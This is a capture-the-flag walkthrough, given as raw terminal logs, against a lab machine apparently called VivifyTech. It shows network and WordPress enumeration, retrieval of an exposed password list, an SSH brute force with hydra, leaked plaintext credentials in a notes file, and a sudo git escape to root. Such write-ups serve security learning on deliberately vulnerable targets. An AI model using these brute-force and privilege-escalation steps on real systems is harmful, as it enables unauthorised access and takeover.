a ctfer on the load

1
┌──(kali㉿kali)-[~]
2
└─$ sudo arp-scan -l
3
Interface: eth0, type: EN10MB, MAC: 12:37:b3:be:69:38, IPv4: 192.168.64.3
4
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
5
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
6
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
7
192.168.64.1    16:7f:ce:9b:a1:64       (Unknown: locally administered)
8
192.168.64.23   de:be:f3:07:14:ee       (Unknown: locally administered)
9

10
2 packets received by filter, 0 packets dropped by kernel
11
Ending arp-scan 1.10.0: 256 hosts scanned in 1.867 seconds (137.12 hosts/sec). 2 responded
12

13
┌──(kali㉿kali)-[~]
14
└─$ nmap -sV -sC -T4 -Pn -p- 192.168.64.23
15
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-17 11:32 HKT
16
Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
17
Service scan Timing: About 50.00% done; ETC: 11:32 (0:00:03 remaining)
18
Nmap scan report for 192.168.64.23
19
Host is up (0.00098s latency).
20
Not shown: 65531 closed tcp ports (reset)
21
PORT      STATE SERVICE VERSION
22
22/tcp    open  ssh     OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
23
| ssh-hostkey:
24
|   256 32:f3:f6:36:95:12:c8:18:f3:ad:b8:0f:04:4d:73:2f (ECDSA)
25
|_  256 1d:ec:9c:6e:3c:cf:83:f6:f0:45:22:58:13:2f:d3:9e (ED25519)
26
80/tcp    open  http    Apache httpd 2.4.57 ((Debian))
27
|_http-server-header: Apache/2.4.57 (Debian)
28
|_http-title: Apache2 Debian Default Page: It works
29
3306/tcp  open  mysql   MySQL (unauthorized)
30
33060/tcp open  mysqlx?
31
| fingerprint-strings:
32
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
33
|     Invalid message"
34
|     HY000
35
|   LDAPBindReq:
36
|     *Parse error unserializing protobuf message"
37
|     HY000
38
|   oracle-tns:
39
|     Invalid message-frame."
40
|_    HY000

1
┌──(kali㉿kali)-[~]
2
└─$ dirb http://192.168.64.23
3

4
-----------------
5
DIRB v2.22
6
By The Dark Raver
7
-----------------
8

9
START_TIME: Mon Feb 17 11:52:06 2025
10
URL_BASE: http://192.168.64.23/
11
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
12

13
-----------------
14

15
GENERATED WORDS: 4612
16

17
---- Scanning URL: http://192.168.64.23/ ----
18
+ http://192.168.64.23/index.html (CODE:200|SIZE:10701)
19
+ http://192.168.64.23/server-status (CODE:403|SIZE:278)
20
==> DIRECTORY: http://192.168.64.23/wordpress/
21

22
---- Entering directory: http://192.168.64.23/wordpress/ ----
23
+ http://192.168.64.23/wordpress/index.php (CODE:301|SIZE:0)
24
==> DIRECTORY: http://192.168.64.23/wordpress/wp-admin/
25
==> DIRECTORY: http://192.168.64.23/wordpress/wp-content/
26
==> DIRECTORY: http://192.168.64.23/wordpress/wp-includes/
27
+ http://192.168.64.23/wordpress/xmlrpc.php (CODE:405|SIZE:42)
28

29
---- Entering directory: http://192.168.64.23/wordpress/wp-admin/ ----
30
+ http://192.168.64.23/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)
31
==> DIRECTORY: http://192.168.64.23/wordpress/wp-admin/css/
32
==> DIRECTORY: http://192.168.64.23/wordpress/wp-admin/images/
33
==> DIRECTORY: http://192.168.64.23/wordpress/wp-admin/includes/
34
+ http://192.168.64.23/wordpress/wp-admin/index.php (CODE:302|SIZE:0)
35
==> DIRECTORY: http://192.168.64.23/wordpress/wp-admin/js/
36
==> DIRECTORY: http://192.168.64.23/wordpress/wp-admin/maint/
37
==> DIRECTORY: http://192.168.64.23/wordpress/wp-admin/network/
38
==> DIRECTORY: http://192.168.64.23/wordpress/wp-admin/user/
39

40
---- Entering directory: http://192.168.64.23/wordpress/wp-content/ ----
41
+ http://192.168.64.23/wordpress/wp-content/index.php (CODE:200|SIZE:0)
42
==> DIRECTORY: http://192.168.64.23/wordpress/wp-content/plugins/
43
==> DIRECTORY: http://192.168.64.23/wordpress/wp-content/themes/
44
==> DIRECTORY: http://192.168.64.23/wordpress/wp-content/upgrade/
45
==> DIRECTORY: http://192.168.64.23/wordpress/wp-content/uploads/
46

47
---- Entering directory: http://192.168.64.23/wordpress/wp-includes/ ----
48
(!) WARNING: Directory IS LISTABLE. No need to scan it.
49
    (Use mode '-w' if you want to scan it anyway)
50

51
---- Entering directory: http://192.168.64.23/wordpress/wp-admin/css/ ----
52
(!) WARNING: Directory IS LISTABLE. No need to scan it.
53
    (Use mode '-w' if you want to scan it anyway)
54

55
---- Entering directory: http://192.168.64.23/wordpress/wp-admin/images/ ----
56
(!) WARNING: Directory IS LISTABLE. No need to scan it.
57
    (Use mode '-w' if you want to scan it anyway)
58

59
---- Entering directory: http://192.168.64.23/wordpress/wp-admin/includes/ ----
60
(!) WARNING: Directory IS LISTABLE. No need to scan it.
61
    (Use mode '-w' if you want to scan it anyway)
62

63
---- Entering directory: http://192.168.64.23/wordpress/wp-admin/js/ ----
64
(!) WARNING: Directory IS LISTABLE. No need to scan it.
65
    (Use mode '-w' if you want to scan it anyway)
66

67
---- Entering directory: http://192.168.64.23/wordpress/wp-admin/maint/ ----
68
(!) WARNING: Directory IS LISTABLE. No need to scan it.
69
    (Use mode '-w' if you want to scan it anyway)
70

71
---- Entering directory: http://192.168.64.23/wordpress/wp-admin/network/ ----
72
+ http://192.168.64.23/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)
73
+ http://192.168.64.23/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)
74

75
---- Entering directory: http://192.168.64.23/wordpress/wp-admin/user/ ----
76
+ http://192.168.64.23/wordpress/wp-admin/user/admin.php (CODE:503|SIZE:2545)
77
+ http://192.168.64.23/wordpress/wp-admin/user/index.php (CODE:503|SIZE:2545)
78

79
---- Entering directory: http://192.168.64.23/wordpress/wp-content/plugins/ ----
80
+ http://192.168.64.23/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)
81

82
---- Entering directory: http://192.168.64.23/wordpress/wp-content/themes/ ----
83
+ http://192.168.64.23/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)
84

85
---- Entering directory: http://192.168.64.23/wordpress/wp-content/upgrade/ ----
86
(!) WARNING: Directory IS LISTABLE. No need to scan it.
87
    (Use mode '-w' if you want to scan it anyway)
88

89
---- Entering directory: http://192.168.64.23/wordpress/wp-content/uploads/ ----
90
(!) WARNING: Directory IS LISTABLE. No need to scan it.
91
    (Use mode '-w' if you want to scan it anyway)
92

93
-----------------
94
END_TIME: Mon Feb 17 11:53:24 2025
95
DOWNLOADED: 36896 - FOUND: 13

1
┌──(kali㉿kali)-[~]
2
└─$ wpscan --url http://192.168.64.23/wordpress --api-token=* -e u
3
_______________________________________________________________
4
         __          _______   _____
5
         \ \        / /  __ \ / ____|
6
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
7
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
8
            \  /\  /  | |     ____) | (__| (_| | | | |
9
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|
10

11
         WordPress Security Scanner by the WPScan Team
12
                         Version 3.8.27
13
       Sponsored by Automattic - https://automattic.com/
14
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
15
_______________________________________________________________
16

17
[+] URL: http://192.168.64.23/wordpress/ [192.168.64.23]
18
[+] Started: Mon Feb 17 13:00:58 2025
19

20
Interesting Finding(s):
21

22
[+] Headers
23
 | Interesting Entry: Server: Apache/2.4.57 (Debian)
24
 | Found By: Headers (Passive Detection)
25
 | Confidence: 100%
26

27
[+] XML-RPC seems to be enabled: http://192.168.64.23/wordpress/xmlrpc.php
28
 | Found By: Direct Access (Aggressive Detection)
29
 | Confidence: 100%
30
 | References:
31
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
32
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
33
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
34
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
35
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
36

37
[+] WordPress readme found: http://192.168.64.23/wordpress/readme.html
38
 | Found By: Direct Access (Aggressive Detection)
39
 | Confidence: 100%
40

41
[+] Upload directory has listing enabled: http://192.168.64.23/wordpress/wp-content/uploads/
42
 | Found By: Direct Access (Aggressive Detection)
43
 | Confidence: 100%
44

45
[+] The external WP-Cron seems to be enabled: http://192.168.64.23/wordpress/wp-cron.php
46
 | Found By: Direct Access (Aggressive Detection)
47
 | Confidence: 60%
48
 | References:
49
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
50
 |  - https://github.com/wpscanteam/wpscan/issues/1299
51

52
[+] WordPress version 6.7.2 identified (Latest, released on 2025-02-11).
53
 | Found By: Rss Generator (Passive Detection)
54
 |  - http://192.168.64.23/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=6.7.2</generator>
55
 |  - http://192.168.64.23/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=6.7.2</generator>
56

57
[+] WordPress theme in use: twentytwentyfour
58
 | Location: http://192.168.64.23/wordpress/wp-content/themes/twentytwentyfour/
59
 | Last Updated: 2024-11-13T00:00:00.000Z
60
 | Readme: http://192.168.64.23/wordpress/wp-content/themes/twentytwentyfour/readme.txt
61
 | [!] The version is out of date, the latest version is 1.3
62
 | [!] Directory listing is enabled
63
 | Style URL: http://192.168.64.23/wordpress/wp-content/themes/twentytwentyfour/style.css
64
 | Style Name: Twenty Twenty-Four
65
 | Style URI: https://wordpress.org/themes/twentytwentyfour/
66
 | Description: Twenty Twenty-Four is designed to be flexible, versatile and applicable to any website. Its collecti...
67
 | Author: the WordPress team
68
 | Author URI: https://wordpress.org
69
 |
70
 | Found By: Urls In Homepage (Passive Detection)
71
 |
72
 | Version: 1.0 (80% confidence)
73
 | Found By: Style (Passive Detection)
74
 |  - http://192.168.64.23/wordpress/wp-content/themes/twentytwentyfour/style.css, Match: 'Version: 1.0'
75

76
[+] Enumerating Users (via Passive and Aggressive Methods)
77
 Brute Forcing Author IDs - Time: 00:00:02 <==> (10 / 10) 100.00% Time: 00:00:02
78

79
[i] User(s) Identified:
80

81
[+] sancelisso
82
 | Found By: Author Posts - Author Pattern (Passive Detection)
83
 | Confirmed By:
84
 |  Rss Generator (Passive Detection)
85
 |  Wp Json Api (Aggressive Detection)
86
 |   - http://192.168.64.23/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
87
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
88
 |  Login Error Messages (Aggressive Detection)
89

90
[+] WPScan DB API OK
91
 | Plan: free
92
 | Requests Done (during the scan): 2
93
 | Requests Remaining: 21
94

95
[+] Finished: Mon Feb 17 13:01:08 2025
96
[+] Requests Done: 57
97
[+] Cached Requests: 6
98
[+] Data Sent: 16.279 KB
99
[+] Data Received: 358.677 KB
100
[+] Memory used: 168.461 MB
101
[+] Elapsed time: 00:00:09

1
┌──(kali㉿kali)-[~]
2
└─$ curl "http://192.168.64.23/wordpress/wp-includes/secrets.txt"
3
agonglo
4
tegbesou
5
paparazzi
6
womenintech
7
Password123
8
bohicon
9
agodjie
10
tegbessou
11
Oba
12
Ifè
13
Abomey
14
Gelede
15
BeninCity
16
Oranmiyan
17
Zomadonu
18
Ewuare
19
Brass
20
Ahosu
21
Igodomigodo
22
Edaiken
23
Olokun
24
Iyoba
25
Agasu
26
Uzama
27
IhaOminigbon
28
Agbado
29
OlokunFestival
30
Ovoranmwen
31
Eghaevbo
32
EwuareII
33
Egharevba
34
IgueFestival
35
Isienmwenro
36
Ugie-Olokun
37
Olokunworship
38
Ukhurhe
39
OsunRiver
40
Uwangue
41
miammiam45
42
Ewaise
43
Iyekowa
44
Idia
45
Olokunmask
46
Emotan
47
OviaRiver
48
Olokunceremony
49
Akenzua
50
Edoculture

1
sarah
2
mark
3
emily
4
jake
5
alex
6
sancelisso

1
┌──(kali㉿kali)-[~/Desktop]
2
└─$ hydra -L usr.txt -P pass.txt 192.168.64.23 ssh
3
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
4

5
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-17 13:23:35
6
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
7
[DATA] max 16 tasks per 1 server, overall 16 tasks, 294 login tries (l:6/p:49), ~19 tries per task
8
[DATA] attacking ssh://192.168.64.23:22/
9
[22][ssh] host: 192.168.64.23   login: sarah   password: bohicon

1
sarah@VivifyTech:~$ ls -a
2
.   .bash_history  .bashrc   .local    .profile
3
..  .bash_logout   .history  .private  user.txt
4
sarah@VivifyTech:~$ cat .private
5
cat: .private: Is a directory
6
sarah@VivifyTech:~$ cd .private/
7
sarah@VivifyTech:~/.private$ ls
8
Tasks.txt
9
sarah@VivifyTech:~/.private$ cat Tasks.txt
10
- Change the Design and architecture of the website
11
- Plan for an audit, it seems like our website is vulnerable
12
- Remind the team we need to schedule a party before going to holidays
13
- Give this cred to the new intern for some tasks assigned to him - gbodja:4Tch055ouy370N

1
gbodja@VivifyTech:~$ sudo -l
2
Matching Defaults entries for gbodja on VivifyTech:
3
    env_reset, mail_badpass,
4
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
5
    !admin_flag, use_pty
6

7
User gbodja may run the following commands on VivifyTech:
8
    (ALL) NOPASSWD: /usr/bin/git

1
gbodja@VivifyTech:~$ sudo -u root /usr/bin/git help config
2
/bin/bash: line 1: bin/bash: Permission denied
3
!done  (press RETURN)
4
root@VivifyTech:/home/gbodja# id
5
uid=0(root) gid=0(root) groups=0(root)